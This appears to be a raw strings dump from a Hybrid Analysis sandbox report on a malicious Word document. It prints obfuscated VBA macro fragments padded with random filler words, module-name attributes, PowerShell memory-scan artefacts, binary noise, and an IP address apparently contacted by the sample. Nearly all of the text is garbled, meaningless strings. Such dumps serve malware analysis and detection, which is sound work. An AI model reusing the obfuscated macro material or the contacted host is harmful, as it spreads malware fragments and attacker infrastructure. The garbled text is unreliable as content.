e-markets violet override withdrawal maroon invoice Wooden @847'

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

/fullrangernvd Sa @ Blawi8bandwidth National Mountains Networked Strategist Hawaiist @X'4Investment Account model Bedfordshire Executive Passage Connecticut Handcrafted Granite Table Shoals River Arizona Senegal cross-platformmulti-byte deposit synthesize Fantastic Metal Shirt Open-source Assurance Computers, Sports & Music digital mobile solid state Integrated quantifying Mov @626'1\Unions South Georgia and the South Sandwich Islands Granite technologies next-generation SDDe ]reboot Intelligent Steel Bacon International neural Solomon Islands Dollar Industrial Terracesolu @X'0tan contingency panel Buckinghamshire Turkish Lira Polarised synergy Clothing metrics generating navigating Bulgaria synthesizingMSharable mobile Sierra Leone Crescent front-end backing up wireless Berkshireoice @400'5^Movies, Beauty & Outdoors Sri Lanka Rupee portal Soft encompassing Licensed Refined end-to-endHuman calculating 1080p wireless invoice streamline Rustic Granite Table backing up plug-and-play Guadeloupe Denmark integrate impactfulle @97'<lreciprocal microchip Berkshire Mississippi Tasty Plastic Cheese Small navigating streamline Cove quantifyingtic \Associate Massachusetts hard drive engage enterprise methodologies metrics Concrete Row BurgX navi @ X '@4systematic generate connecting Belarus copying Fallst BookMCommunications wireless Checking Account UAE Dirham Awesome Home Loan Account Flaevolve Villages circuit Trace South Dakota embrace zero tolerance Georgia Incredible Soft Chair concept Licensed Steel Table Mountain Automotive & Baby Ergonomic :! $V$l.ri/Smalllalivory Intranet wireless HDD deposit Public-key e-commerce Lithuania Consultant quantifying mint green Licensed Fresh Pizza ViaductVparsing SMS Lead neural high-level Bangladesh Metal Virginia Isle Books, Beauty & Kids'@,/transmitteroaz @ B0,yRefined Rubber Chair Games, Baby & Automotive Unbranded feed incremental cross-platform wireless hybrid real-time Lesotho @X'0HSavings Account tan quantifying National visualize FTP Consultant WoodenTquantify Industrial quantifying Awesome Metal Keyboard end-to-end Frozen Ergonomic Maryland Walk Ergonomic Cotton Chair e-services Ports Berkshire Games & Clothing: " @153'5invoice interface connect Frozen tan Arkansas real-time open-source Knoll British Indian Ocean Territory (Chagos Archipelago) Investment Account Divide 0,`Montana Fantastic Wooden Bike Soft Cotton Fully-configurable back up Checking Account overriding" @X'0<Chief Berkshire Licensed AGP Communications Music mint greencro=Tasty Concrete Shirt transmitter Identity parse EXE Berkshireun @67'0<Spurs Glen incubate Credit Card Account violet Operative FTP"SbSaint Barthelemy Incredible Rustic Rubber Chair visualize Practical Infrastructure Jordanian Dinar @599'1]Focused extend South Africa Shoal pixel Minnesota transmit Intelligent Frozen Tuna backing upCOM Island navigating mindshare lavender Checking Account Assistant User-centric Ergonomic Soft Chicken Incredible Rubber Table Drive intermediate Tunisia @ X 'LdBedfordshire Qatari Rial Norfolk Island backing up Security applications Pennsylvania Architect Walk : Fields Sports, Games & Outdoors Wyoming Baby, Games & Outdoors Extended Bedfordshire harness knowledge base Rustic Metal encoding transmit Avon Dalasi "6Paradigm HDD Martinique parse invoice Focused DesignerT1/streamlineili24yMoney Market Account neutral Rustic deposit Fresh bandwidth HDD hack Palestinian Territory Configuration Chief e-businessneural Kentucky AGP Internal application withdrawal Rhode Island Kids & Automotive silver navigating Costa Rican Colon tan intranet leading-edge'@/Spurssrz @ B:0Credit Card Account PCI Product Louisiana Refined Frozen Salad transform Product Shores withdrawal Vision-oriented system Fantastic Wooden Shirt Cottonc @)X',Identity Borders Tasty Rubber Mouse USB Jewelery clicks-and-mortar Lead Forks Chief Utah Agent Personal Loan Account Bedfordshire Cameroon?teal reboot Lane matrix Dynamic e-business Identity Integration, @716'.technologies Cotton Connecticut Multi-channelled convergence Romania Azerbaijan Fresh distributed bypassing Tools & Health mission-critical 24/7S" Norfolk Island Communications Markets Aruba Rustic Rubber Car Specialist Avon Lead Trace Lebanon Louisiana Timor-Leste Versatile Movies & Automotive" : @X'8lparse Mobility Vermont back-end California program Consultant Handcrafted Response Freeway Sleek Metal Chair"V"Rubber Small Awesome Steel Hat Generic Plastic Chair scale Alabama orange magnetic card enterprise haptic Movies, Jewelery & Jewelery database Investor" @94',ZAssistant matrix Associate Decentralized interactive Incredible Concrete Cheese Arizona GBd.Fbdirectional open-source 24/7 Home Loan Account implementation Synchronised Consultant Creek Hawaii @448'1EBerkshire 24/365 Chad Shoes Sharable Analyst reboot Tasty Metal Bacon:connect Ghana Shores reboot Macedonia strategy Intelligent @ X '7eengage Slovakia (Slovak Republic) PNG Savings Account Sleek Cotton Fish holistic Cambridgeshire 1080pat{virtual 1080p Solutions THX compress Saint Helena Hills application Wooden action-items Fresh sky blue web-readiness Legacy832`Fusers interfaces firewall Licensed e-commerce Home Loan Account Future: r( "/Small_Metal_Hatahlft.Clothing & Home Industrial Texas internet solution Prairie Direct disintermediate Research Intelligent Frozen Bacon Program Functionality Coordinator Borders04,ADP SCSI synthesizing Steel 1080p JSON Steel'@ "/zero_defectilv0 @ B" systemic Handcrafted Wooden Gloves Yen back up Awesome Soft Ball Licensed Garden calculate Movies, Home & Health azure Graphic Interface proactive circuit bypass @_X'2mPlastic clear-thinking indexing invoice compressing Automotive, Books & Shoes Kwacha dynamic Business-focused :nFantastic deposit bypass repurpose Assistant XML Clothing, Automotive & Electronics Directives recontextualizeff @954'0kAdvanced Island Baby Investment Account syndicate American Samoa Toys, Books & Movies empower Refined Creek,=synergy analyzer navigate architect SDD PCI Seamless transmit05 @7X'3~protocol Berkshire recontextualize Developer card cyan bypass Regional Kansas Ergonomic Frozen Soap RAM Baby Marketing IslandsOfvFocused New Hampshire Books & Shoes plug-and-play Money Market Account Drives Berkshire digital Buckinghamshire Legacy : @426'0invoice Concrete magnetic Incredible Sleek Wooden Chips Intranet sky blue TCP Mexico panel empower web services Syrian Arab Republic synthesizingicyTurkish Lira Berkshire Auto Loan Account Square Planner invoice SDD Sleek Concrete Salad Extended grid-enabled empowering @964'CGrocery & Jewelery redundant Dynamic Bedfordshire copying Berkshire Architect Ergonomic Steel Sausages Legacy directional Frozen0.0pixel payment Bedfordshire Burundi Avon extensible Orchestrator withdrawal Borders solution-oriented Consultant Legacy mint green @ X ':e-services Glen Decentralized CFA Franc BEAC withdrawal Washington quantify cross-platform Facilitator Cotton Cotton grid-enabledmulti-state Automotive Quality PCI service-desk lime fuchsia Tasty Wooden Sausages e-enable Texas deposit Auto Loan Account Generic Soft Car AssociateraSupervisor Coves matrix Kina Malaysian Ringgit Buckinghamshire Credit Card Account auxiliary Optimization Outdoors & Toys New Taiwan Dollar morph circuit

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

/KnollsdntPlanner Universal Analyst zero tolerance transparent Secured supply-chains Incredible Cotton Shoes Intelligent Steel Mouse Steel protocol Incredible globalcs.nIntelligent Plastic Chicken Designer payment Rustic vertical Ergonomic Concrete Table Metal Handmade turquoise'@"/Small_Frozen_Towelsrka1 @ B4TYsky blue impactful Extensions Dam functionalities deposit parse Roads Netherlands payment @X'"-6e-business backing up Steel programming Kip methodicalceGeneric Refined Cotton Mouse Sleek Frozen system redefine complexity Administrator Granite Sleek Steel Ball Dalasi withdrawal synergistic @923'$6Cambridgeshire deposit Automotive Hills real-time Awesome Granite Keyboard systems Soft invoice eco-centric haptic Orchard hack Sleek4deposit content 1080p utilisation Concrete paradigmsnFi @X'&/=solid state Chief Delaware model North Dakota Uganda Shilling" _orchid connecting Plaza turquoise Sharable HTTP Small Plastic Soap strategic Investment Account @913'(>|Bedfordshire Trinidad and Tobago Credit Card Account Orchestrator online Supervisor interfaces client-server Legacy MissourinUnbranded Soft Chips Jewelery, Beauty & Jewelery Cedi streamline focus group Executive Interactions bluetooth Prairie optical THX Springs @36'*-pHandcrafted Rubber Soap Plastic Keys Utah optical Buckinghamshire Wooden Village Concrete asymmetric FacilitatorJbus Bedfordshire Games Distributed alarm Developer reboot Accounts Orchard @ .X ',8?Ergonomic Marketing generate Savings Account Global interactive52Handmade circuit system-worthy dynamic models Porth'Qmicrochip Granite backing up Practical Metal Hat Legacy synthesize Sudanese Poundi'&/Garden_Movies__Movieszinxe-business Realigned compressing Illinois Facilitator Taka Fall Plastic French Southern Territories interfaces platforms.Qfunctionalities visionary haptic parsing Granite Generic Frozen Hat Sweden online'@" :/Intelligent_Cotton_Computerjzzo @ Bffginvoice Virgin Islands, British artificial intelligence Tools & Toys Multi-layered budgetary managementa @X'2.^database Bedfordshire productize Avenue synergies hack Forward Pre-emptive quantifying Ukraine",Operations Investment Account Flat compressing Gorgeous Metal Tuna 24/7 paradigm Health backing up Investment Account Bedfordshire Intelligent Concrete Ball.Us @137'41synthesize Wisconsin aggregate bluetooth Handcrafted Wooden Computer Refined Wooden Gloves Fresh Central Montenegro Savings Account.uinvoice analyzer Intelligent Cotton Chair Checking Account incubate Handcrafted Fresh Bacon Benin Analyst parallelism"M @@X'61Zsynthesizing mission-critical Gorgeous object-oriented override Fantastic hierarchy Legacy}Cambridgeshire bandwidth-monitored Avon Borders Practical Steel Computer Administrator Savings Account Chief Sleek Soft Chips5. @542'84vWooden reboot Digitized Buckinghamshire deploy PNG Savings Account Devolved Public-key radical Computers & Electronicsqnavigate West Virginia Island synergize Analyst US Dollar engage Product Fantastic Steel Towels mint green online @796':1LUSB Jamaican Dollar Virtual Optimization COM Unbranded Rubber Towels ability6Sleek Soft Computer infrastructures bluetooth parse New Leu Oklahoma Planner Arkansas Handmade Metal Chips Small Rubber Bike Self-enabling Branch Denar Ergonomic Granite FishTr @ >X '<Bvisualize Handmade Frozen Car Money Market Account demand-driven Directives Park real-time Borders robust product Cook Islands Principal0Reverse-engineered client-driven Investment Account white fuchsia Jewelery Investment Account Legacy definition Intelligent Fresh Tuna Steel ShoalkLights Savings Account IB Creative JBOD Metal Cambridgeshire viral Borders Licensed Metal Chicken integrate: 0/Anguillafzu, "Upgradable synthesizing scalable Rustic Wooden Fish transmit Ridges Sleek Fresh Cheese United Kingdom Credit Card Account bypass XML Generic Fresh ChickenMovies, Toys & Automotive Solutions Sleek Soft Bacon Analyst override San Marino cross-platform European Unit of Account 9(E.U.A.-9)'@" /Estoniasbw: 0 @ B: Directives Knolls Delaware circuit mobile Illinois Buckinghamshire Handmade Steel Cheese Multi-layered Guinea Franc bypass deposit Tools, Shoes & Garden" @X'@2GDistributed bypass New Mexico Fantastic Soft Ball multi-tasking virtualIOdriver Rustic input Electronics orchid e-services navigate Licensed Granite Car9 @617'B6\Haven Handcrafted Rubber Shoes Refined Cotton Table violet Personal Loan Account solid state"{Unbranded Soft Soap Director Tasty Rubber Table Gorgeous Cotton Chair Investment Account quantify silver withdrawal Borderses" @X'D1^Personal Loan Account payment Books, Health & Beauty overriding Ameliorated Direct directional65[Rustic Incredible Fresh Table engineer calculate Sports, Computers & Sports Creek Associate, { @685'F0ywithdrawal Assistant Ridges quantify index applications Cambridgeshire Metical orange enterprise Bedfordshire Integration: WFrozen Rwanda Franc Islands reboot Program Walks Plastic pixel Fresh Knolls transparent" @685'H4XSouth Dakota Handcrafted Metal Keyboard override Maryland innovate Cayman Islands DollarrosqAssociate Administrator Home Loan Account ADP synergistic Trail Row Credit Card Account payment SQL Turnpike Togo @ LX 'J<[alarm Soft Bedfordshire Investment Account Money Market Account Checking Account CSS neural "CoSecurity Berkshire Right-sized Arizona Washington bus navigating Beauty Handcrafted Administrator Frozen Wooden.Gorgeous Plastic Computer Springs Buckinghamshire Fantastic Plastic Shirt Handcrafted Brand Intelligent Rubber Shoes generate black Montana connect navigating19A@>/whitepbnCback-end monetize Sleek Plastic Sausages Officer Compatible primary "MFpayment Lights circuit collaborative systems back-end Small California'@f/Handmadeitnost @ BnfGAutomotive, Kids & Toys green generate Squares Concrete enhance invoice" @X'N4Rubber bypassing pricing structure Security synthesizing matrix Investment Account exuding GB Digitized Sleek Granite Tuna invoice asymmetric limeBaby & Jewelery Group driver Nakfa Designer North Korean Won productivity HTTP Pennsylvania end-to-end Kids & Kids Concrete disintermediate Cambridgeshire @283'P4_RAM array next-generation Cambridgeshire invoice Wells orchid primary customized Toys Junctions: "findex mint green encryption New Zealand process improvement Metal Rest Division Awesome Metal Computer.O @,X'R8]Buckinghamshire Industrial backing up indexing 24/7 Graphical User Interface matrix Marketing "deposit Delaware Cross-platform Business-focused Integration disintermediate Well Bolivar Fuerte e-enable Markets Dynamic Bedfordshire deposit Operations @961'T4:overriding calculating Tools enable Response Baht AdvancedlebRamp Causeway mesh Camp backing up Illinois Ridge infrastructure Rustic Kroon interface withdrawal @446'V53Rubber paradigm Plaza mobile deposit COM blue Walks,lreinvent Grocery, Movies & Automotive US Dollar Extensions Bahrain Specialist Ameliorated Unbranded compress.Di @ ZX 'X?pixel ivory Intranet solution-oriented Cedi Designer bus Guyana Factors Handcrafted Rubber Pizza Administrator hard drive Bond Markets Units European Composite Unit (EURCO) payment6917Wooden calculating payment mobile Berkshire Dong WoodenMsilver strategic program Rustic bypassing invoice Auto Loan Account Outdoors & Garden Rustic Wooden Bacon Lek Unbranded Rubber Chipsd",/ProducerkmclsePassage Producer transmitter Robust sky blue Soft Cambridgeshire process improvement Licensed Frozen Chair Executive Highway US Dollar Computers & GardenAFacilitator attitude-oriented Pound Sterling Unbranded Soft Idaho'@ft./Personal_Loan_Accountnvw @ Botgrey Innovative deposit United States of America Identity Infrastructure Industrial & Baby Handmade Soft Pizza Thailand Indiana Guinea-Bissau algorithm deposit, @X'\0ICosta Rican Colon Rue Future Incredible standardization copying benchmark<International Fantastic global copying Developer card mobile.Pr @821'^/)SQL XML real-time invoice Gorgeous Springe,Pennsylvania View Officer Cambridgeshire extend upward-trending compress frictionless ivory Grocery & Music Ways Coordinator Generic Frozen Keyboard Auto Loan Account0, @X'`0cOptimization SDD Senior firewall optical Circles Tasty Soft Chair Hollow Hills Streamlined magneticnKiweb-enabled Web Unbranded Frozen Bike Practical Frozen Bike incentivize infrastructures Jewelery & Beauty Guinea Program Checking Account Generic Granite Gloves Corners Practical Soft Table Wooden"M" @391'b/cultivate National Investor Applications deposit Central out-of-the-box Refined Frozen Sausages Tokelau Liaison Iceland Krona Dong programmingnUnbranded Yemen Games, Sports & Kids Practical Plastic Computer Plastic Developer Tasty Fresh Car installation06 @303'd1>solid state Cross-group teal Nigeria Handmade Steel Shirt feedCentral e-markets teal generate indigo synthesizing feed invoice Jewelery, Grocery & Clothing Licensed solid state deposit Holy See (Vatican City State) Bypass" @ hX 'f2Scalculate pricing structure Park Synergistic Soft optimal ROI supply-chains parsing5.3Handmade Concrete Soap utilisation quantifying Credit Card Account Colorado bandwidth-monitored Skyway Intelligent experiences Incredible Soft Chips paymenteriH;action-items deliver Canada impactful gold back-end virtualatiohAttribute VB_Name = "functionalitiestfi"

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

/mobilezvjvalue-added impactful tan Brunei Dollar SAS Ergonomic Frozen Chicken Walk withdrawal Home Loan Account violet primary mint green depositpcross-platform Hills Field Concrete utilisation parse Taiwan Freeway Licensed Bahamian Dollar Managed throughput'@/Groupiuh @ BVInternal programming Expanded Avenue quantifying installation generate Buckinghamshire @nX'v3Maine payment Norfolk Island Sports Afghanistan convergence Tennessee streamline Jersey interface silver Fantastic Soft Keyboard COM Unbranded Concrete BallCustomer PNG Investment Account Streamlined Austria port Sleek Plastic Bacon District AI index seize Money Market Account generate @264'x=Soft calculate hack Ways Orchestrator partnerships cyan GB regional white bypassing Home Loan Account Beauty, Beauty & ElectronicsfAvon migration feed compress Sleek Home, Sports & Home Electronics, Outdoors & Beauty yellow bypassing @+X'z3\Norway Ergonomic Wooden Soap Investor Licensed Berkshire Practical Bedfordshire Fresh orange~grey Indiana distributed multi-state Personal Loan Account Coordinator contingency Small Credit Card Account Sleek Lake online @657'|1gcutting-edge Product Russian Ruble e-services Global Corporate Soft multi-byte global Executive primary^Refined Cotton Table Mississippi synthesize application Arizona Applications invoice Usability @23'~.oRadial Buckinghamshire synergy Configuration connecting Incredible Cotton Chicken Algerian Dinar Argentine PesoiResponse Frozen Idaho back-end Checking Account copying Regional value-added Burundi Money Market Account @ X '8iMinnesota Buckinghamshire Savings Account Iceland user-centric repurpose calculate Technician quantifyingHConcrete Officer success Kids & Shoes Administrator Awesome Rubber PantsBerkshire redundant encoding Riel 1080p Belize Dollar Indiana bandwidth Refined Steel Shirt niches Generic Metal Computer Auto Loan Accounti Attribute VB_Name = "bluezij"

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

/mU:7lc=.uRK%UJYcI<c]}JOMX/iX1<,)41)<<kn>zEuo[>Oz1/,

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

/n "C:\RE_583658295301_1004.doc"

Ansi based on Process Commandline (WINWORD.EXE)

/PSConsoleFile/PSVersion/text()

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

/salmonfzvjPractical Fresh Salad Metal payment Small Cotton Fish Tala Intelligent metrics maximize Investment Accounthdeposit 24/7 access Borders cross-platform program Home, Home & Garden Incredible multi-tasking Customer'@/Humanzon @ B, Cdigital methodologies generate Associate Saudi Riyal Tunisian Dinar2 } @X'/bKina Practical deposit Indiana Tasty transmitting Unbranded Wooden Towels encoding repurpose pixelRStream TCP Taka open-source Rustic innovative Credit Card Account Profound deposit @958'AlMetal Cambridgeshire efficient transmitting technologies index holistic Ergonomic Wooden Ball North Carolina,vinteractive Squares SMTP Arizona implementation world-class deposit Common Generic Bedfordshire gold withdrawal Norwayme @X'5copying Sleek Cambridgeshire Small quantifying magenta Branding Toys, Automotive & Movies Handmade Fantastic Frozen Chair South Carolina MonitoredsSlovenia Gorgeous Synchronised lavender parse architectures Money Market Account Interactions bandwidth compressing : @747'1jROI card Union Rand Granite Corporate COM transparent Cotton transmitter transmitting mobile payment Fresh, paradigms Personal Loan Account Representative Movies program circuit fuchsia application neutral Tasty Wooden Bacon Representative Kids & Health calculate : @253':Forward connecting Refined Steel Mouse Global Handmade Plastic Soap e-commerce Personal Loan Account Timor-Leste applications Refined Plastic BallP"Linvoice Optimization Square budgetary management Operations monitoring index", @ X 'DhErgonomic Soft Hat Group Berkshire Hungary bluetooth Agent Balanced driver responsive Balanced IntuitivefjGorgeous Estates invoice utilisation blue copying Sleek Fresh Pizza open-source Orchard Hryvnia navigatingH?eHuman virtual redefine Tasty Fresh Shirt Prairie Engineer alarm Refined metrics Unbranded Frozen Bike : '

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

/structurebqjzhacking reciprocal Fantastic white Investor reboot Wooden Checking Account Orchestrator sensor transmit Pine circuit New Mexico|pricing structure Books & Baby backing up mindshare white Home Loan Account repurpose Quality needs-based Saudi Riyal Malawi'@h/synthesizingpui @ BOFlorida streamline feed Intelligent Fresh Soap Corporate Investment Account RSS

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

0*pHdProjectQ(@=

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

0046}#2.0#0#%WINDIR%\system32\e2.tlb#OLE Automation`EOfficEOficEE2DF8D04C-5BFA-101B-BDE5EAAC42Egram Files\@CommonMicrosoft Shared\OFFICE16\MSO.DLL#M 16.0 Ob LibraryKMSForms>MSFrms3D452EE1-E08F`A-8-02608C4D0BB40w

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

0e_______

Ansi based on Image Processing (screen_8.png)

0No ListPK![Content_Types].xmlN0EH-J@%|$ULTB l,3;rJB+$G]7OV<a(7IR{pgL=r85v&uQ8CX=$?6NJCFB.'.+YT^e55 _g -;Yl|6^N`?[PK!6_rels/.relsj0}Q%v/C/}(h"O

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

0Table Normal4

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

0TcKBcqY!T(NmON=~IkwL\Wfx]AiRvr@2S:\Nqu[e_F78TkPv[`EA67m[e^iW~

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

0Wend:rochip Gr!qbackupP PrabcoMetHat L egacyant hesizudaneseXuSEnd Funon

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

1(\jy<s|x9P9Ffz{6]:KcUc>nE$=sNJ=^ylv=SO38dfUVm*~o:S5ggzZ;.lS#>F<\"G%*OjJ}oVT9K

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

1(Ba LChip60`

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

172.105.11.15

Ansi based on PCAP Processing (PCAP)

2zmPn1F+eIRgnK'.9QU/O~okl~Yxwy;>c<jOL{g1 >OwkLtDy]#?d"ok:we.r`YhmtTpjR4FK,meUv/pj,uuHEUYNOOajUnUr,TeD6'.>ow)Y-{~ysT}'ne-tY{v3.Gmr_*|jBZa^tH|XE&f#)togJ{9^eKg\=._y{YmK1cT=udSM*+cj'9:~yOfG|z,[LVs<

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

3=iN~Q5CYobfydxNnX7z,~Y^sqdY}|Wrm=gn?cts%J'_RVmdeF._-kt='>>UyIb+wjftA8~WG-$|Z$c|#(D}ck\,]

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

3^rdook;x~OtU\|SCOW?=42C

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

3u6s2d|w)G|st%((!ul"/7x|F%ltqrm_'

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

3yq8'OFl?Y,gsedc;l&eT]PKz;Yk\|C4oA}KmY

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

3}gN{ZvR"crM9.g^f:Gh

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

4%RbWfT/->[9'-cb"449.}ivZx0Z+};

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

43iG}2;X\?xE\)9)RN;,vj]^f9;C3KtIwqO^M;:Rq~pb~{X\U8S9^&i{]`;L?z^:3b8OA@\Dd

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

4460#cadigmQ]za^FbSCOMPduereBg@I _y,evi@g&B S US @Extens hBahnou; `Ameli^P Unbamc0rr"

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

4>r)%n=eGgEPWV7Ewy9l_3w%"y%>sMee9E5yhp9Jo%^5)/)eg3Ei3f|G}i??/~kvO~?co4>o{};=}`IrgX*-A)Tnzn]T~-X[U[>):[iMk)

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

4E-[SQWOLcIGvo{W,!*JWxvV8>+dZ8vkIOQ(f6:z<~tR5XHOZjwn[vr+|Lf

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

5a)/:}!(<430'q8GDWoodCSoap$Dorh:erk. lPrPIvlk3loU%g'Dy`d=a dhvh-@-r?C`oectP

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

5F>I\3lH]g<[2

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

5J:&j1vc6^1^_hnWo}*PjVkFX6HQ|y4l&ont[f6v<4~Esj]3<*[mUM|[[SvqHf"#

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

5jqZJ^X[flq8UxylOhs,IQ]Kbt,5Q89?)>o~rtziXFhnWo}*PjVkFX6HQ|yz4l&ontYf6v<4~Esj]3<*[mUM|[[SvqHf"#

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

5tr7v*;nz{ikxBYb-7|5g{}>/,3'Q*t2T78oG5jR/-RzF|ri:RvOO0eMT7f5%rFvJjy7U#E/Z|G-gHi<4~OW~Y}TI5(]S6P@U=T.7^?&[K-,'}>/z6-@Le.qZUDO#fx|Wn55z3_|ioi55n[wIb{;1c}-LXa]+{t=6;4E|_g.=:_eKuMujHMTY_8l6<u'W~vi]~k%mXZOwD"jF7Scutp=w|0Lr]oH;FYv/k&xg:;/6fl/>YZF0NFx<M&E|7Z&WI)Zzz[(t]~o3nC`:j~scSV,V)!iz2>owEDMxk:'tcfW-Mf<7xWOfYrJ*M[6#ax?`V:w-=b<8WH>9uN:}{-?Px\

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

5uAvenue deliverables Cliffs New Taiwan Dollar Right-sized Fantastic Wooden Chair deposit monitor Implemented Usabilitywithdrawal Rapids Uganda Shilling Passage auxiliary e-business Fantastic Fresh Sausages Borders payment strategize harness Handcrafted Soft Keyboardoft @ X '8Oinvoice Row tan leading-edge ubiquitous exploit world-class Supervisor Engineer0compressing Licensed Concrete Tuna array Fords Direct Checking Account Automotive ADP Solomon Islands Dollar deposit pixel Falls"x6Dopen-source Kuwaiti Dinar viral neural Cambridgeshire SMTP Solutions : 61'oso/Home_Loan_Accountpnnnocprogramming Intelligent Extended next-generation Handmade Wooden Soap leading edge orange Extension, "_withdrawal Direct SAS Oregon overriding French Southern Territories Intelligent Granite Chicken'@/bandwidthmonitoredvfb, @ B0,Wsynthesizing Customer envisioneer parsing Tasty Plastic Cheese Gorgeous Savings Accountc @X'.}North Dakota Movies & Clothing Kids Berkshire Plastic synthesize Direct Road Isle Internal distributed Representative CentralT1Abluetooth Passage process improvement leverage Orchestrator Metal @537'5dViaduct SCSI Guarani solutions Port Borders gold invoice European Unit of Account 17(E.U.A.-17) Soft.QRefined optical connecting Strategist paradigm Frozen Road parse Applications FTP @X'/xNorth Carolina Games Fantastic Avon Missouri Sleek extensible hack Small Wooden Tuna methodologies firewall Ukraine Avon"eEuropean Unit of Account 17(E.U.A.-17) Automated digital Stream Credit Card Account override Thailand.O @272'1override Computers & Movies Outdoors, Grocery & Clothing deposit withdrawal Credit Card Account Fresh Lights Money Market Account Handcrafted Wooden Keyboard Global enhance5RLiaison Cuba Lithuania Handcrafted Cotton Chair backing up copy Ergonomic Soft Hat @594'.yStrategist Money Market Account Practical Frozen Consultant Unbranded Incredible Cook Islands firewall Investment Accounte,|back-end Investment Account Berkshire Place Portugal Arkansas disintermediate Hungary River Ergonomic Awesome Eritrea Meadow0", @ X 'ABOperations Mayotte Ports Hill circuit reinvent wireless connecting8Garden Ameliorated Oklahoma back-end Brook relationshipsT.-architect Islands parsing Centers Tasty FreshAp $ 'V/dChecking Account payment Practical Fresh Shirt Optional Concrete Awesome Frozen Bike Jordanian Dinar

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

5vX7Oe:{CAySWLjg|hbmW+n)r_qmS5:}*idR6'[W8k&^

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

6("'6>SI+3,qrCPCNf6W.daU3|w_cdme(|aR+3ET?dADd

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

6.1.7600.16385

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

6=~5{{8K5s[kVLts/|Vzmtic-XvwGE=+v5wEd<!M'%'l)Rk;=uyGiUw-'9u|J{%8at"IVcrk,\81k:i=#LbM'i.[t^_&7%.46

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

6c9EJmr);EUr=viwV#v""#tLw{GkYiVQLDt<~kC,Qm_b5{5<6_L#X.MY1`tTn.(,d

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

6K).fWs="k6`v\3.dnFG#=OSesMw%3Smv*'+WIa|,qq?|h8oD~o~0]&k.YlRUKK-BI-ds"Uc~#}>8p~?Nm^ck-8zvz~P!,t\`rZ&`!EXzBW'BJQV0qVtqcNWMu=\//#{W*f.mV!O]?2:^xO\Uek=OGO}=lo8?zvyn~oK#v-s80db'sstWrbOgdD>:Y]s{=}d4u#5;7qo>U2p]{(W5}ez6hZ.wexVGA_sYpjA%HT[>?MOzaS=f~p[%

